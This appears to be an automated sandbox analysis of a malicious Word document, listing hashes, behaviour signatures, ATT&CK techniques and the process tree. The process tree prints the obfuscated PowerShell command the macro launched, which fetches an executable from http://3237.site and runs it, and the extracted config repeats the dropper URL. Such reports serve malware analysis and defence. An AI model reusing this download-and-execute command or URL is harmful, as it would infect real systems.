Analysis

  • max time kernel
    100s
  • max time network
    134s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-04-2024 14:53

General

  • Target

    f1d1c93ba65f0593f2c5a26f8661ca3f42ae2331f5eb97911aac8f5dbf3d4011.doc

  • Size

    58KB

  • MD5

    616ef8b1c8e9258511905b37029d5a42

  • SHA1

    fa62e7df0cc1ece81ba2228cc22be01214cab2ab

  • SHA256

    f1d1c93ba65f0593f2c5a26f8661ca3f42ae2331f5eb97911aac8f5dbf3d4011

  • SHA512

    79bf89fa545325810831541d76cb5b9ae7695cd7ae9eefb108bf396d1f79c5437987aa41fa342e60b1390036ae6ba4d280c7d6946dfd9c33791d7da8f8e6396d

  • SSDEEP

    768:WPKiEo5D9iF7gWMsdMVkOf11cdqS1+ODtxz99oinZ:WdE8D9iF7gWMsdlO91cdqSpDt3

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://3237.site/test01.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f1d1c93ba65f0593f2c5a26f8661ca3f42ae2331f5eb97911aac8f5dbf3d4011.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3892
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\programtwo.cmd" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2604
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://3237.site/test01.e`xe -Destination C:\Users\Public\Documents\manlevel.e`xe;C:\Users\Public\Documents\manlevel.e`xe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4784

Network

MITRE ATT&CK Matrix ATT&CK v13

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z141vnuf.dnx.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Public\Documents\programtwo.cmd
    Filesize

    185B

    MD5

    accc5f9fb1cd478b3649066e0868612d

    SHA1

    309c94e34869a7bc62ee53144f1a98290c53d76f

    SHA256

    93941817ada793281eaaa3dd6860d4d63a361ec15b13da7322ea4ed51e6eff6a

    SHA512

    0bf231c1b3d67473ea7faccdc20eee9e52ba29cd30882305fd43276a3f794e100e9c77eaf3d623df167c1c1713195085d78efce8234bcd0e4460cbd16eef2ed4

  • memory/3892-33-0x00000180BE490000-0x00000180BF460000-memory.dmp
    Filesize

    15.8MB

  • memory/3892-7-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-3-0x00007FFC85210000-0x00007FFC85220000-memory.dmp
    Filesize

    64KB

  • memory/3892-6-0x00007FFC85210000-0x00007FFC85220000-memory.dmp
    Filesize

    64KB

  • memory/3892-5-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-4-0x00007FFC85210000-0x00007FFC85220000-memory.dmp
    Filesize

    64KB

  • memory/3892-41-0x00000180BE490000-0x00000180BF460000-memory.dmp
    Filesize

    15.8MB

  • memory/3892-1-0x00007FFC85210000-0x00007FFC85220000-memory.dmp
    Filesize

    64KB

  • memory/3892-8-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-10-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-11-0x00007FFC83100000-0x00007FFC83110000-memory.dmp
    Filesize

    64KB

  • memory/3892-12-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-13-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-9-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-14-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-15-0x00007FFC83100000-0x00007FFC83110000-memory.dmp
    Filesize

    64KB

  • memory/3892-16-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-17-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-0-0x00007FFC85210000-0x00007FFC85220000-memory.dmp
    Filesize

    64KB

  • memory/3892-21-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-20-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-22-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-23-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-25-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-18-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-2-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-104-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-46-0x00000180BE490000-0x00000180BF460000-memory.dmp
    Filesize

    15.8MB

  • memory/3892-67-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-68-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-69-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-105-0x00007FFCC5190000-0x00007FFCC5385000-memory.dmp
    Filesize

    2.0MB

  • memory/3892-70-0x00000180BE490000-0x00000180BF460000-memory.dmp
    Filesize

    15.8MB

  • memory/3892-71-0x00000180BE490000-0x00000180BF460000-memory.dmp
    Filesize

    15.8MB

  • memory/3892-72-0x00000180BE490000-0x00000180BF460000-memory.dmp
    Filesize

    15.8MB

  • memory/3892-45-0x00000180BE490000-0x00000180BF460000-memory.dmp
    Filesize

    15.8MB

  • memory/3892-103-0x00007FFC85210000-0x00007FFC85220000-memory.dmp
    Filesize

    64KB

  • memory/3892-102-0x00007FFC85210000-0x00007FFC85220000-memory.dmp
    Filesize

    64KB

  • memory/3892-101-0x00007FFC85210000-0x00007FFC85220000-memory.dmp
    Filesize

    64KB

  • memory/3892-100-0x00007FFC85210000-0x00007FFC85220000-memory.dmp
    Filesize

    64KB

  • memory/4784-75-0x000002747F090000-0x000002747F0A0000-memory.dmp
    Filesize

    64KB

  • memory/4784-76-0x000002747F500000-0x000002747F526000-memory.dmp
    Filesize

    152KB

  • memory/4784-77-0x000002747F770000-0x000002747F784000-memory.dmp
    Filesize

    80KB

  • memory/4784-78-0x000002747F090000-0x000002747F0A0000-memory.dmp
    Filesize

    64KB

  • memory/4784-81-0x00007FFC9C930000-0x00007FFC9D3F1000-memory.dmp
    Filesize

    10.8MB

  • memory/4784-74-0x000002747F090000-0x000002747F0A0000-memory.dmp
    Filesize

    64KB

  • memory/4784-73-0x00007FFC9C930000-0x00007FFC9D3F1000-memory.dmp
    Filesize

    10.8MB

  • memory/4784-60-0x000002747F090000-0x000002747F0A0000-memory.dmp
    Filesize

    64KB

  • memory/4784-59-0x000002747F090000-0x000002747F0A0000-memory.dmp
    Filesize

    64KB

  • memory/4784-58-0x00007FFC9C930000-0x00007FFC9D3F1000-memory.dmp
    Filesize

    10.8MB

  • memory/4784-57-0x000002747F390000-0x000002747F3B2000-memory.dmp
    Filesize

    136KB